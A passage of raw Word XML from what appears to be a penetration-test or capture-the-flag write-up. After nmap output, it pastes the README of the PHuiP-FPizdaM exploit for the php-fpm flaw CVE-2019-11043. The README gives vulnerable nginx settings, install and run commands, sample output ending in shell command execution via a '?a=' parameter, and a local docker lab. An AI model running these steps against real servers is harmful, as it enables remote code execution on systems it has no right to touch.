      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>External links</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap done: 1 IP address (1 host up) scanned in 23.10 seconds </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -4 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Copied the version   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">nginx 1.19.0 and </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Pasted it in google  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">The results is </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t># PHuiP-FPizdaM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>## What's this</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see [below](#the-full-list-of-preconditions)).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>## What's vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If a webserver runs nginx + php-fpm and nginx have a configuration like</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>location ~ [^/]\.php(/|$) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  fastcgi_split_path_info ^(.+?\.php)(/.*)$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  fastcgi_param PATH_INFO       $fastcgi_path_info;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  fastcgi_pass   php:9000;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>}which also lacks any script existence checks (like try_files), then you can probably hack it with this sploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>#### The full list of preconditions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. Nginx + php-fpm, location ~ [^/]\.php(/|$) must be forwarded to php-fpm (maybe the regexp can be stricter, see [#1](https://github.com/neex/phuip-fpizdam/issues/1)).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. The fastcgi_split_path_info directive must be there and contain a regexp starting with ^ and ending with $, so we can break it with a newline character.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3. There must be a PATH_INFO variable assignment via statement fastcgi_param PATH_INFO $fastcgi_path_info;. At first, we thought it is always present in the fastcgi_params file, but it's not true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4. No file existence checks like try_files $uri =404 or if (-f $uri). If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5. This exploit works only for PHP 7+, but the bug itself is present in earlier versions (see [below](#about-php5)).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>## Isn't this known to be vulnerable for years?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>A long time ago php-fpm didn't restrict the extensions of the scripts, meaning that something like /avatar.png/some-fake-shit.php could execute avatar.png as a PHP script. This issue was fixed around 2010.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The current one doesn't require file upload, works in the most recent versions (until the fix has landed), and, most importantly, the exploit is much cooler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>## How to run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Install it using</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>go get github.com/neex/phuip-fpizdam</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If you get strange compilation errors, make sure you're using go &gt;= 1.13. Run the program using phuip-fpizdam [url] (assuming you have the $GOPATH/bin inside your $PATH, otherwise specify the full path to the binary). Good output looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:15 Base status code is 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:15 Status code 500 for qsl=1745, adding as a candidate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:15 The target is probably vulnerable. Possible QSLs: [1735 1740 1745]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:16 Attack params found: --qsl 1735 --pisos 126 --skip-detect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:16 Trying to set "session.auto_start=0"...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:16 Detect() returned attack params: --qsl 1735 --pisos 126 --skip-detect &lt;-- REMEMBER THIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:16 Performing attack using php.ini settings...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:40 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&amp;" to URLs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:40 Trying to cleanup /tmp/a...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2019/10/01 02:46:40 Done!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>`After this, you can start appending `?a=&lt;your command&gt;` to all PHP scripts (you may need multiple retries).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>## Playground environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If you want to reproduce the issue or play with the exploit locally, do the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. Clone this repo and go to the `reproducer` directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Create the docker image using `docker build -t reproduce-cve-2019-11043 .`. It takes a long time as it internally clones the php repository and builds it from the source. However, it will be easier this way if you want to debug the exploit. The revision built is the one right before the fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Run the docker using `docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3. Now you have http://127.0.0.1:8080/script.php, which is an empty file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4. Run the exploit using `phuip-fpizdam http://127.0.0.1:8080/script.php`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5. If everything is ok, you'll be able to execute commands by appending `?a=` to the script: http://127.0.0.1:8080/script.php?a=id. Try multiple times as only some of php-fpm workers are infected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>## About PHP5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The buffer underflow in php-fpm is present in PHP version 5. However, this exploit makes use of an optimization used for storing FastCGI variables, [_fcgi_data_seg](https://github.com/php/php-src/blob/5d6e923/main/fastcgi.c#L186). This optimization is present only in php 7, so this particular exploit works only for php 7. There might be another exploitation technique that works in php 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>## Credits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.inioptions. Final php.ini options set is found by [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>beched</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>](</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://twitter.com/ahack_ru" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style85"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>https://twitter.com/ahack_ru</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
